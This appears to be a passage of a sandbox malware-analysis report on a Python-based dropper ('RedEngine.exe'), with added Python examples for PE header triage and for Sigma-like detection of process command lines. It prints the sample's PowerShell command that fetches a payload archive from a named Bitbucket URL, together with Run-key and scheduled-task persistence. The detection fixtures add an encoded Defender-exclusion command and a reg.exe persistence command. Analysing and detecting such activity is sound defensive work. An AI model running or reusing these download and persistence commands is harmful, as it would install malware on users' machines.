                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3809366779.00007FFB226D1000.00000002.00000001.01000000.00000010.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848674222.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1932878487.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: mgne4i3n.t1d2.exe, 0000001F.00000002.3806869534.00007FFB0B574000.00000002.00000001.01000000.00000017.sdmp, clppth.exe, 0000002A.00000002.3802742975.00007FFB1DED4000.00000002.00000001.01000000.0000002F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3793790170.00007FFB0197C000.00000002.00000001.01000000.0000001D.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1935960901.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3800269232.00007FFB1C3CC000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3793790170.00007FFB0197C000.00000002.00000001.01000000.0000001D.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1935960901.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3800269232.00007FFB1C3CC000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3804653921.00007FFB0B48E000.00000002.00000001.01000000.0000001C.sdmp, clppth.exe, 00000026.00000003.1847327209.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1930590183.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476082957.000002C8869BB000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809691380.00007FFB226F3000.00000002.00000001.01000000.0000000F.sdmp, clppth.exe, 00000026.00000003.1842187984.00000156D218B000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1928851563.000002C498ACA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02479000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476082957.000002C8869BB000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809691380.00007FFB226F3000.00000002.00000001.01000000.0000000F.sdmp, clppth.exe, 00000026.00000003.1842187984.00000156D218B000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1928851563.000002C498ACA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_tkinter.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3806016882.00007FFB0B4D8000.00000002.00000001.01000000.00000018.sdmp, clppth.exe, 00000026.00000003.1849282939.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1942221585.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02511000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809064972.00007FFB1E3B9000.00000002.00000001.01000000.00000013.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1941486532.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3806753681.00007FFB23AD9000.00000002.00000001.01000000.0000002B.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3806869534.00007FFB0B574000.00000002.00000001.01000000.00000017.sdmp, clppth.exe, 0000002A.00000002.3802742975.00007FFB1DED4000.00000002.00000001.01000000.0000002F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3807780292.00007FFB1BA6D000.00000002.00000001.01000000.00000015.sdmp, clppth.exe, 0000002A.00000002.3805477731.00007FFB23A9D000.00000002.00000001.01000000.0000002D.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Unpacked PE file: 13.2.mgne4i3n.t1d1.exe.400000.0.unpack
Source: Yara match | File source: 13.0.mgne4i3n.t1d1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.mgne4i3n.t1d1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe, type: DROPPED
Source: mgne4i3n.t1d0.exe.3.dr, -.cs | .Net Code: _E05F System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\System32\cmd.exe | Process created (2 identical launches): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Code function: 13_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary, 13_2_0040A756
Source: mgne4i3n.t1d0.exe.3.dr | Static PE information: real checksum: 0x0 should be: 0x7a0b7
Source: RedEngine.exe | Static PE information: real checksum: 0x0 should be: 0x7f50
Source: mgne4i3n.t1d1.exe.3.dr | Static PE information: real checksum: 0x0 should be: 0x1d9f9
Source: pyarmor_runtime.pyd.14.dr, pyarmor_runtime.pyd.38.dr, pyarmor_runtime.pyd.41.dr | Static PE information: real checksum: 0x9e4af should be: 0xa256d
Source: mgne4i3n.t1d1.exe.3.dr | Static PE information: section name: .code
Source: VCRUNTIME140.dll.14.dr, VCRUNTIME140.dll.38.dr, VCRUNTIME140.dll.41.dr | Static PE information: section names: fothk, _RDATA
Source: libcrypto-3.dll.14.dr, libcrypto-3.dll.38.dr, libcrypto-3.dll.41.dr | Static PE information: section name: .00cfg
Source: libssl-3.dll.14.dr, libssl-3.dll.38.dr, libssl-3.dll.41.dr | Static PE information: section name: .00cfg
Source: python312.dll.14.dr, python312.dll.38.dr, python312.dll.41.dr | Static PE information: section name: PyRuntim
Source: zlib1.dll.14.dr, zlib1.dll.38.dr, zlib1.dll.41.dr | Static PE information: section name: .xdata
Source: pyarmor_runtime.pyd.14.dr, pyarmor_runtime.pyd.38.dr, pyarmor_runtime.pyd.41.dr | Static PE information: section name: .xdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFAAB33D2A5 pushad ; iretd 3_2_00007FFAAB33D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFAAB4595F2 push eax; ret 3_2_00007FFAAB45962D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFAAB452A8C pushad ; retf 3_2_00007FFAAB452AA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFAAB4510CD push E8609E0Dh; ret 3_2_00007FFAAB4510F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFAAB45B588 pushad ; retf 3_2_00007FFAAB45B591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFAAB524C1E push cs; ret 3_2_00007FFAAB524C20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFAAB527073 pushad ; iretd 3_2_00007FFAAB527075
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 11_2_04958BE9 push ss; retf 11_2_04958BEF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 30_2_00007FFAAB45200D pushad ; retf 30_2_00007FFAAB4523E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 30_2_00007FFAAB453F0D pushad ; iretd 30_2_00007FFAAB45407D
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_64949AE6 push qword ptr [rax+50FFF8C3h]; ret 31_2_64949AED
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FFB0B489B0C push 82000085h; retn 0000h 31_2_00007FFB0B489B11
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C413F22 push rbx; ret 42_2_00007FFB1C413F2A
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB22729B0C push 82000085h; retn 0000h 42_2_00007FFB22729B11
Source: mgne4i3n.t1d0.exe.3.dr | Static PE information: section name: .text entropy: 7.259374278277474
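The "real checksum ... should be", "section name" and ".text entropy" lines above are static PE header checks. The script below is an added example, not Joe Sandbox's code and not taken from the sample: it parses the PE headers, recomputes IMAGE_OPTIONAL_HEADER.CheckSum the way the Windows image checksum is defined (32-bit words summed with end-around carry, folded to 16 bits, plus the file length), lists section names outside a small set of conventional ones (that set is an assumption of the example, not the sandbox's list) and computes per-section Shannon entropy. The minimal PE32+ image it builds is constructed for the example so it runs offline; to check one of the dropped files, pass the file's bytes to `triage` instead.

```python
import math
import struct

# Section names a stock MSVC or MinGW build normally carries. This is an assumption of
# the example, not Joe Sandbox's whitelist; tune it for your environment.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc",
                   ".idata", ".edata", ".tls", ".bss", ".CRT"}


def build_min_pe(sections, checksum=0):
    """Constructed minimal PE32+ file (not a real sample): DOS header, PE signature,
    COFF header, optional header, then one section header and raw data per entry."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)            # PE32+ magic
    struct.pack_into("<I", opt, 0x40, checksum)      # IMAGE_OPTIONAL_HEADER.CheckSum
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(opt), 0x22)
    pointer = e_lfanew + 4 + len(coff) + len(opt) + 40 * len(sections)
    table, raw = b"", b""
    for name, body in sections:
        table += struct.pack("<8sIIII", name, len(body), pointer, len(body), pointer) + b"\0" * 16
        raw += body
        pointer += len(body)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table + raw


def parse_pe(data):
    """Locate the CheckSum field and read the section table (PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    checksum_off = opt + 0x40                         # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        name, _vsize, _va, rsize, rptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "raw": data[rptr:rptr + rsize]})
    return {"checksum_offset": checksum_off,
            "stored_checksum": struct.unpack_from("<I", data, checksum_off)[0],
            "sections": sections}


def pe_checksum(data, checksum_offset):
    """Recompute CheckSum as imagehlp's CheckSumMappedFile defines it: with the field
    itself zeroed, add every 32-bit word with end-around carry, fold to 16 bits, then
    add the file length."""
    buf = bytearray(data)
    buf[checksum_offset:checksum_offset + 4] = b"\0\0\0\0"
    buf += b"\0" * (-len(buf) % 4)                    # pad the tail to a whole dword
    total = 0
    for off in range(0, len(buf), 4):
        total += struct.unpack_from("<I", buf, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def shannon_entropy(blob):
    """Bits per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(data):
    """Reproduce the report's static PE findings for one file image."""
    pe = parse_pe(data)
    expected = pe_checksum(data, pe["checksum_offset"])
    return {
        "real_checksum": pe["stored_checksum"],
        "should_be": expected,
        "checksum_mismatch": pe["stored_checksum"] != expected,
        "unusual_sections": [s["name"] for s in pe["sections"] if s["name"] not in COMMON_SECTIONS],
        "section_entropy": {s["name"]: shannon_entropy(s["raw"]) for s in pe["sections"]},
    }


def set_checksum(data, value):
    """Write a CheckSum into the header, as a linker run with /RELEASE would."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, parse_pe(data)["checksum_offset"], value & 0xFFFFFFFF)
    return bytes(buf)


if __name__ == "__main__":
    # Two sections: constant bytes (entropy 0) and a uniform byte spread (entropy 8).
    sample = build_min_pe([(b".text", b"\xC3" * 0x200), (b".code", bytes(range(256)) * 2)])
    r = triage(sample)
    print(f"real checksum: {r['real_checksum']:#x} should be: {r['should_be']:#x}")
    print("unusual sections:", r["unusual_sections"], "entropy:", r["section_entropy"])
```

A stored CheckSum of 0 only means the linker never filled the field in; plenty of legitimately built user-mode binaries ship that way, so the mismatch is supporting evidence next to the odd section names and the high .text entropy, not proof of packing on its own.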

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Roaming\runHidden.vbs
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: memset,wsprintfA,CreateFileA,memset,DeviceIoControl,CloseHandle,isxdigit,isxdigit,isxdigit,isprint,memcpy,CloseHandle,strlen,memcpy, \\.\PhysicalDrive%d 31_2_648D3E30
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: _snprintf,_snprintf,CreateFileA,CreateFileA,GlobalAlloc,DeviceIoControl,GlobalFree,_snprintf,CreateFileA,GlobalAlloc,GlobalAlloc,GlobalAlloc,DeviceIoControl,GlobalFree,GlobalFree,GlobalFree,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle, \\.\PhysicalDrive%d 31_2_648D3A80
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Process created (2 launches): "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Process created: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe"
Source: C:\Windows\System32\cmd.exe | Process created (2 identical launches): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
Source: C:\Windows\System32\cmd.exe | Process created (5 launches): reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Files created (dropped): C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe, C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe, C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | File created (dropped): C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Files created (dropped) under C:\Users\user\AppData\Local\Temp\_MEI15482\ (PyInstaller extraction directory), 19 files: VCRUNTIME140.dll, libcrypto-3.dll, libffi-8.dll, libssl-3.dll, python312.dll, tcl86t.dll, tk86t.dll, zlib1.dll, _bz2.pyd, _ctypes.pyd, _decimal.pyd, _hashlib.pyd, _lzma.pyd, _socket.pyd, _ssl.pyd, _tkinter.pyd, select.pyd, unicodedata.pyd, pyarmor_runtime_000000\pyarmor_runtime.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Files created (dropped) under C:\Users\user\AppData\Local\Temp\_MEI60002\ (PyInstaller extraction directory): the same 19 files as in _MEI15482 above
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Files created (dropped) under C:\Users\user\AppData\Local\Temp\_MEI68282\ (PyInstaller extraction directory): the same 19 files as in _MEI15482 above

Boot Survival

Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: memset,wsprintfA,CreateFileA,memset,DeviceIoControl,CloseHandle,isxdigit,isxdigit,isxdigit,isprint,memcpy,CloseHandle,strlen,memcpy, \\.\PhysicalDrive%d 31_2_648D3E30
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: _snprintf,_snprintf,CreateFileA,CreateFileA,GlobalAlloc,DeviceIoControl,GlobalFree,_snprintf,CreateFileA,GlobalAlloc,GlobalAlloc,GlobalAlloc,DeviceIoControl,GlobalFree,GlobalFree,GlobalFree,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle, \\.\PhysicalDrive%d 31_2_648D3A80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Registry value created or modified (2 writes): HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CLPPTH
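The process-creation lines in the Persistence and Boot Survival sections (cmd.exe launching powershell.exe with WebClient.DownloadFile, reg.exe and schtasks.exe, a VBS dropped into AppData, the HKCU Run value) are exactly what endpoint telemetry would carry. As an added example that is not part of the report and not the Sigma project's rules, the Python below runs simplified stand-ins for the Sigma rules named in the overview (PowerShell DownloadFile, Net WebClient casing anomalies, Base64-encoded MpPreference cmdlet, VBS from AppData) over constructed process events. Events 0 and 1 reproduce command lines visible in this report; the wscript.exe launch, the encoded Add-MpPreference command and the reg.exe arguments are assumptions made up for the example (the report shows reg.exe launches but not their arguments). The rule names and patterns are this example's own.

```python
import base64
import re

CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def encode_command(script):
    """What -EncodedCommand expects: base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events. Events 0 and 1 reproduce command lines from
# the report; events 2-5 are assumptions made up for this example.
SAMPLE_EVENTS = [
    {"parent": CMD, "image": PS, "cmdline": r'''powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"'''},
    {"parent": CMD, "image": r"C:\Windows\System32\schtasks.exe", "cmdline": 'schtasks /query /tn "MyBatchScript"'},
    {"parent": CMD, "image": r"C:\Windows\System32\wscript.exe", "cmdline": r'wscript.exe "C:\Users\user\AppData\Roaming\runHidden.vbs"'},
    {"parent": CMD, "image": PS, "cmdline": "powershell -NoProfile -e " + encode_command(r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'")},
    {"parent": CMD, "image": r"C:\Windows\System32\reg.exe", "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CLPPTH /t REG_SZ /d "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe" /f'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": r'powershell -ExecutionPolicy Bypass -Command "Get-ChildItem C:\Temp"'},
]

# Simplified stand-ins for the Sigma rules named in the report overview; the patterns
# and names are this example's, not the Sigma project's.
RULES = [
    ("PowerShell DownloadFile", re.compile(r"(?i)webclient.*downloadfile")),
    ("MpPreference exclusion added", re.compile(r"(?i)add-mppreference.*-exclusion(path|extension|process)")),
    ("Run key persistence via reg.exe", re.compile(r"(?i)\breg(\.exe)?\s+add\s+.*\\currentversion\\run\b")),
    ("Scheduled task created", re.compile(r"(?i)\bschtasks(\.exe)?\s+/create\b")),
    ("VBS executed from AppData", re.compile(r"(?i)\b[wc]script(\.exe)?\b.*\\appdata\\.*\.vbs\b")),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...), so
# the switch match is loose; -ExecutionPolicy and -ErrorAction are excluded by the
# lookahead and the captured payload is validated by actually decoding it.
ENCODED_ARG = re.compile(r"(?i)\s-e(?![xr])[a-z]*\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def webclient_casing_anomaly(text):
    """'Net.WebClient' in odd casing is a cheap evasion of case-sensitive string matches."""
    m = re.search(r"(?i)net\.webclient", text)
    return bool(m) and m.group(0) != "Net.WebClient"


def evaluate(event):
    """Return the names of the rules that fire for one process-creation event."""
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        text = text + "\n" + decoded          # match against the decoded script as well
    hits = [name for name, rx in RULES if rx.search(text)]
    if decoded is not None:
        hits.append("Encoded PowerShell command line")
    if webclient_casing_anomaly(text):
        hits.append("Net WebClient casing anomaly")
    return hits


def scan(events):
    """Map each event index to its rule hits, dropping events that trigger nothing."""
    result = {}
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"][:60], "->", hits)
```

Two points the sample output makes: the encoded command only matches after it is decoded, which is why the rule runs over the decoded text rather than the raw command line; and the `schtasks /query /tn "MyBatchScript"` line visible in this section only checks whether the task exists, so the task-creation rule keys on `/create` rather than on any schtasks.exe launch.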

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened (4 times): C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened (3 times): C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FFB019B41F0 IsIconic,IsZoomed,AdjustWindowRectEx,SendMessageW,SendMessageW,GetSystemMetrics,MoveWindow,GetWindowRect,GetClientRect,MoveWindow,GetWindowRect,MoveWindow,DrawMenuBar, 31_2_00007FFB019B41F0
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C5C41F0 IsIconic,IsZoomed,AdjustWindowRectEx,SendMessageW,SendMessageW,GetSystemMetrics,MoveWindow,GetWindowRect,GetClientRect,MoveWindow,GetWindowRect,MoveWindow,DrawMenuBar, 42_2_00007FFB1C5C41F0
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BC6EA0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_00007FF741BC6EA0
Source: C:\Users\user\Desktop\RedEngine.exe | Process information set (15 times): NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set (46 times): NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
